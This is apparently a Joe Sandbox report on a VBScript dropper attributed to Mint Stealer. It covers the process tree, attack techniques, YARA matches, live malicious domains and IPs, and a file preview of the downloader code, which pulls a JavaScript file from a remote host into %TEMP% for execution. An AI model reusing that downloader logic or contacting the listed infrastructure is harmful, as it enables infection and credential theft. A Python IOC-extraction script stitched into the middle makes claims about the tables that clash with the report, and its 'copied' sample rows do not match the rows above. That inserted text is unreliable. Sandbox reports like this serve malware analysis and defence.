            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.2374218432.0000024EA3D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.2374218432.0000024EA4C69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.2332748509.000001CA0111C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7016, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.2374218432.0000024EA3D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.2374218432.0000024EA4C69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.2332748509.000001CA0111C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7016, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | 121 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 121 Scripting | 111 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 11 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1576836 | Sample: 67618a47ee8c5.vbs | Startdate: 17/12/2024 | Architecture: WINDOWS | Score: 100
            • 57 pko-download.kagyouth.co.ke (2->57)
            • 59 gsosnub8zg3.top (2->59)
            • 61 www.google.com (2->61)
            • 71 Suricata IDS alerts for network traffic (2->71)
            • 73 Yara detected Mint Stealer (2->73)
            • 75 Sigma detected: WScript or CScript Dropper (2->75)
            • 77 6 other signatures (2->77)
            • 11 wscript.exe 1 (2->11, started)
            • 91 VBScript performs obfuscated calls to suspicious functions (11->91)
            • 93 Obfuscated command line found (11->93)
            • 95 Windows Scripting host queries suspicious COM object (likely to drop second stage) (11->95)
            • 97 2 other signatures (11->97)
            • 14 cmd.exe 3 2 (11->14, started)
            • 16 cmd.exe 1 (11->16, started)
            • 18 cmd.exe (11->18, started)
            • 20 wscript.exe 16 (14->20, started)
            • 24 conhost.exe (14->24, started)
            • 26 conhost.exe (16->26, started)
            • 28 curl.exe 2 (16->28, started)
            • 31 wscript.exe (18->31, started)
            • 33 conhost.exe (18->33, started)
            • 51 C:\Users\user\AppData\Local\Temp\bmkvfo.js, ISO-8859 (20->51, dropped)
            • 79 Windows Scripting host queries suspicious COM object (likely to drop second stage) (20->79)
            • 35 wscript.exe (20->35, started)
            • 81 Obfuscated command line found (26->81)
            • 83 Creates processes via WMI (26->83)
            • 63 pko-download.kagyouth.co.ke 45.11.180.77, 443, 49709, 49711 M247GB Germany (28->63)
            • 65 127.0.0.1 unknown unknown (28->65)
            • 53 C:\Users\Public\67618a47ee8cd.vbs, ASCII (28->53, dropped)
            • 55 C:\Users\user\AppData\Local\Temp\iethuj.js, ISO-8859 (31->55, dropped)
            • 85 System process connects to network (likely due to code injection or exploit) (31->85)
            • 37 wscript.exe 1 (31->37, started)
            • 40 conhost.exe (35->40, started)
            • 43 conhost.exe (35->43, started)
            • 87 Windows Scripting host queries suspicious COM object (likely to drop second stage) (37->87)
            • 89 Obfuscated command line found (40->89)
            • 45 powershell.exe 14 15 (40->45, started)
            • 49 powershell.exe 15 (43->49, started)
            • 67 www.google.com 172.217.19.228, 49740, 49741, 80 GOOGLEUS United States (45->67)
            • 99 Queries Google from non browser process on port 80 (45->99)
            • 69 gsosnub8zg3.top 193.149.129.61, 49732, 49733, 80 DANISCODK Denmark (49->69)

            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            gsosnub8zg3.top | 193.149.129.61 | true | true | | unknown
            pko-download.kagyouth.co.ke | 45.11.180.77 | true | true | | unknown
            www.google.com | 172.217.19.228 | true | false | | high
            Name | Malicious | Antivirus Detection | Reputation
            https://pko-download.kagyouth.co.ke/js/bmkvfo.txt | true | Avira URL Cloud: safe | unknown
            https://pko-download.kagyouth.co.ke/list_files.php | true | Avira URL Cloud: safe | unknown
            http://gsosnub8zg3.top/1.php?s=mints21 | true | Avira URL Cloud: safe | unknown
            https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs | true | Avira URL Cloud: safe | unknown
            https://pko-download.kagyouth.co.ke/js/iethuj.txt | true | Avira URL Cloud: safe | unknown
            http://www.google.com/ | false | | high
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://pko-download.kagyouth.co.ke/list_files.php5wscript.exe, 0000000A.00000003.2262573242.000001E9AF339000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266195441.000001E9AF33D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.google.comxpowershell.exe, 0000000F.00000002.2374218432.0000024EA3F9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://go.micropowershell.exe, 0000000F.00000002.2374218432.0000024EA4C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0111C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://drive.google.com/?tab=wopowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://contoso.com/Iconpowershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://0.googlepowershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbsFcurl.exe, 00000004.00000002.2172280031.000001979CB30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://mail.google.com/mail/?tab=wmpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.google.com/preferences?hl=enpowershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.youtube.com/?tab=w1powershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://0.google.powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://pko-download.kagyouth.co.ke/jswscript.exe, 0000000A.00000003.2262948648.000001E9B13B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2267957717.000001E9B13B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2262881738.000001E9B13AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2239939221.000001E9B13BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifXpowershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://0.google.com/powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.google.com/history/optout?hl=enpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://books.google.com/?hl=en&tab=wppowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.google.com/logos/doodles/2024/seasonal-holidays-2powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://translate.google.com/?hl=en&tab=wTpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.google.com/logos/doodles/2024/seasonal-holidpowershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://calendar.google.com/calendar?tab=wcpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://aka.ms/pscore68powershell.exe, 0000000F.00000002.2374218432.0000024EA3B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs&curl.exe, 00000004.00000002.2172280031.000001979CB37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://www.google.com/logos/doodles/2024/seasonal-holidXpowershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 0000000F.00000002.2374218432.0000024EA407D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00616000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
IP | Domain | Country | ASN | ASN Name | Malicious
172.217.19.228 | www.google.com | United States | 15169 | GOOGLEUS | false
193.149.129.61 | gsosnub8zg3.top | Denmark | 15411 | DANISCODK | true
45.11.180.77 | pko-download.kagyouth.co.ke | Germany | 9009 | M247GB | true
IP
127.0.0.1
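The URL table above mixes the stager's infrastructure (pko-download.kagyouth.co.ke, contacted by curl.exe and wscript.exe) with benign strings that PowerShell carries in memory (Google, Pester, contoso.com). Note also that every row in the URL table is flagged "malicious: false", while the IP/domain table flags pko-download.kagyouth.co.ke and gsosnub8zg3.top as malicious, so the domain table is the flag to trust when extracting IOCs. The following Python script is an added example, not part of the Joe Sandbox report: it parses rows in the flattened form they take on this page, joins them with the IP/domain table, and lists the hosts the report marks malicious together with the processes whose memory held their URLs. The sample input is constructed from a few of the rows above; the set of process names is assumed from this report, and the interpretation of the memory-dump name fields (first field = analysis-internal process number, fourth = region base address) is an assumption, not documented behaviour.

```python
import re
from urllib.parse import urlsplit

# Constructed sample input: four rows copied from the flattened URL table
# (URL + source dump(s) + "false" run together), each followed by either the
# reputation line ("high") or an AV verdict line plus "unknown".
URL_ROWS = """\
https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs5curl.exe, 00000004.00000002.2172280031.000001979CB37000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
unknown
https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmpfalse
high
https://pko-download.kagyouth.co.ke/list_files.php5wscript.exe, 0000000A.00000003.2262573242.000001E9AF339000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266195441.000001E9AF33D000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
unknown
http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpfalse
high
"""

# The IP/domain table from the report: (ip, domain, country, asn, asn_name, malicious).
IP_ROWS = [
    ("172.217.19.228", "www.google.com", "United States", 15169, "GOOGLEUS", False),
    ("193.149.129.61", "gsosnub8zg3.top", "Denmark", 15411, "DANISCODK", True),
    ("45.11.180.77", "pko-download.kagyouth.co.ke", "Germany", 9009, "M247GB", True),
]

# Process names seen in this report's source column (assumed list). Anchoring on
# a fixed set avoids mis-splitting URLs such as ".../imghp?hl=en&tab=wipowershell.exe",
# where a generic "<word>.exe" pattern would swallow "tab=wi" into the process name.
PROC = r"(?:powershell|wscript|cscript|curl|cmd)\.exe"
DUMP = r"[0-9A-F]{8}(?:\.[0-9A-F]+){7}\.sdmp"
SOURCE = rf"{PROC}, {DUMP}"
ROW = re.compile(rf"^(?P<url>https?://.*?)(?P<sources>{SOURCE}(?:, {SOURCE})*)(?P<malicious>true|false)$")
SOURCE_RE = re.compile(rf"({PROC}), ({DUMP})")


def parse_url_rows(text):
    """Rebuild records from the flattened rows.

    The URL keeps whatever trailing bytes the memory string carried (e.g.
    "...vbs5", "...php5"); only the host part is treated as reliable.
    """
    rows = []
    for line in text.splitlines():
        line = line.strip()
        m = ROW.match(line)
        if m:
            sources = SOURCE_RE.findall(m["sources"])
            rows.append({
                "url": m["url"],
                "host": urlsplit(m["url"]).hostname,
                "processes": sorted({proc for proc, _ in sources}),
                # Assumed field meanings: field 1 = process number within the
                # analysis, field 4 = base address of the dumped region.
                "dumps": [(d.split(".")[0], d.split(".")[3]) for _, d in sources],
                "malicious": m["malicious"] == "true",
                "detection": None,
                "reputation": None,
            })
        elif rows and line.startswith("•"):
            rows[-1]["detection"] = line.lstrip("• ").strip()
        elif rows:
            rows[-1]["reputation"] = line
    return rows


def extract_iocs(url_text, ip_rows):
    """Join URL rows with the IP/domain table, keyed by host name.

    The domain table's malicious flag wins over the per-URL flag, because the
    report marks the stager URLs "false" while flagging their domain "true".
    """
    by_host = {}
    for ip, domain, country, asn, asn_name, malicious in ip_rows:
        by_host[domain] = {"ip": ip, "asn": f"AS{asn} {asn_name}", "country": country,
                           "malicious": malicious, "urls": [], "processes": set()}
    for row in parse_url_rows(url_text):
        entry = by_host.setdefault(row["host"], {"ip": None, "asn": None, "country": None,
                                                  "malicious": row["malicious"],
                                                  "urls": [], "processes": set()})
        entry["urls"].append(row["url"])
        entry["processes"].update(row["processes"])
    return by_host


def malicious_hosts(iocs):
    """Hosts the report marks malicious, sorted for stable output."""
    return sorted(host for host, entry in iocs.items() if entry["malicious"])


if __name__ == "__main__":
    iocs = extract_iocs(URL_ROWS, IP_ROWS)
    for host in malicious_hosts(iocs):
        e = iocs[host]
        print(f"{host} {e['ip']} {e['asn']} processes={sorted(e['processes'])}")
        for url in e["urls"]:
            print(f"  {url}")
```

Running the script lists gsosnub8zg3.top (no URL string was recovered for it in this section, only the IP-table entry) and pko-download.kagyouth.co.ke with the curl.exe and wscript.exe strings that referenced it, and drops the Google and Pester noise.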
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576836
Start date and time: 2024-12-17 16:31:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 67618a47ee8c5.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@28/13@3/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 12
• Number of non-executed functions: 4
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 2144 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7016 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 67618a47ee8c5.vbs
Time | Type | Description
10:32:12 | API Interceptor | 88x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
193.149.129.61 | PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta | malicious | Mint Stealer | gsosnub8zg3.top/1.php?s=mints21
45.11.180.77 | PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta | malicious | Mint Stealer |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
pko-download.kagyouth.co.ke | PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta | malicious | Mint Stealer | 45.11.180.77
gsosnub8zg3.top | PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta | malicious | Mint Stealer | 193.149.129.61
Match | Associated Sample Name / URL | Detection | Threat Name | Context
M247GB | PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta | malicious | Mint Stealer | 45.11.180.77
M247GB | uEhN67huiV.dll | malicious | Unknown | 45.92.33.62
M247GB | JkICQ13OOY.dll | malicious | Unknown | 45.84.107.198
M247GB | Clienter.dll.dll | malicious | Unknown | 185.216.35.222
M247GB | 236236236.elf | malicious | Unknown | 38.207.211.244
M247GB | i486.elf | malicious | Mirai | 194.124.33.29
M247GB | bot.arm.elf | malicious | Mirai | 38.202.251.237
M247GB | armv4l.elf | malicious | Mirai | 185.94.188.130
M247GB | https://fsharetv.io | malicious | Unknown | 38.132.109.126
M247GB | mipsel.nn.elf | malicious | Mirai, Okiru | 89.185.76.25
DANISCODK | PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta | malicious | Mint Stealer | 193.149.129.61
DANISCODK | https://chhimi.com | malicious | Unknown | 193.149.176.248
DANISCODK | ufAzjSlbk9.js | malicious | Unknown | 193.149.129.134
DANISCODK | a3psA7WqQ5.js | malicious | Unknown | 193.149.129.134
DANISCODK | 8Rf6zqjxx3.js | malicious | Unknown | 193.149.129.134
DANISCODK | aazStC8zop.js | malicious | Unknown | 193.149.129.134
DANISCODK | Dgc1F2yZwm.js | malicious | Unknown | 193.149.129.134
DANISCODK | QGfY7FF7QH.js | malicious | Unknown | 193.149.129.134
                                                                                                                              8Rf6zqjxx3.jsGet hashmaliciousUnknownBrowse
                                                                                                                              • 193.149.129.134
                                                                                                                              rzugG77nwE.jsGet hashmaliciousUnknownBrowse
                                                                                                                              • 193.149.129.134
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                              No context
Process: C:\Windows\System32\curl.exe
File Type: ASCII text
Category: modified
Size (bytes): 1928
Entropy (8bit): 4.449895555983109
Encrypted: false
SSDEEP: 48:q58OOD+y8Qyl+hLMpvELdQu8EwNcr1Vmzd/In/IIv:q5FOD+y8QXhLM9KQuJwNcr1VmztInwIv
MD5: B25F8E57F50608E9644802482DAD72B1
SHA1: 9CAE940FDD733ACFD32FF271C461A13D0B8878FF
SHA-256: 557D6FC2139CA5AD6E0CF5DE5F61659C3247C62D68BE39C653C7E420F13DDD96
SHA-512: D1AFDB4D41995870FAE576B781472A41160DBF18CB51E0DEC607CA3D0DEDC86FACA327DFDA8D4ED675548E324640FC7722C458293DEA02A6303A1D96DCBAC19D
Malicious: true
Preview: Option Explicit..Sub DownloadAndExecuteJS(baseUrl, listEndpoint, jsFolder). Dim xmlhttp, fso, shell, jsFiles, selectedFile, tempFolder, jsFilePath. Set xmlhttp = CreateObject("MSXML2.XMLHTTP"). Set fso = CreateObject("Scripting.FileSystemObject"). Set shell = CreateObject("WScript.Shell").. On Error Resume Next. xmlhttp.Open "GET", baseUrl & listEndpoint, False. xmlhttp.Send.. If Err.Number <> 0 Then. Err.Clear. Exit Sub. End If.. If xmlhttp.Status = 200 Then. jsFiles = Split(Trim(xmlhttp.responseText), vbLf).. If UBound(jsFiles) >= 0 Then.. Randomize. selectedFile = Trim(jsFiles(Int((UBound(jsFiles) + 1) * Rnd))) .. If selectedFile <> "" Then.. tempFolder = shell.ExpandEnvironmentStrings("%TEMP%").. If Not fso.FolderExists(tempFolder) Then. fso.CreateFolder(tempFolder). End If.. jsFilePath = tempFolder & "\" & Replace
Process: C:\Windows\System32\wscript.exe
File Type: Unicode text, UTF-8 text, with very long lines (1690)
Category: dropped
Size (bytes): 217296
Entropy (8bit): 4.780424858663202
Encrypted: false
SSDEEP: 3072:n5S7T815mtM97T815WtMJtM77T815V7T815O:W65zl65jYX65d65O
MD5: FCF8FD71DF4EC7AA10B2EE31F14C5C4B
SHA1: 0D604716D766562AFEEE8FA8839AAC8424C78A15
SHA-256: 8C3B278A4B2285D5718FD14033148A765B959517DD1F6E1D2B0BA6ED5F5BE0E4
SHA-512: DD450A2649AD87B18EC5BE707A7396DD3D2ABC4E003352FB80EC2C5AF65432B53998C7FF969855D071818E8FA4E11778CE62B684E29D0ACD7EFFFB43704AC613
Malicious: false
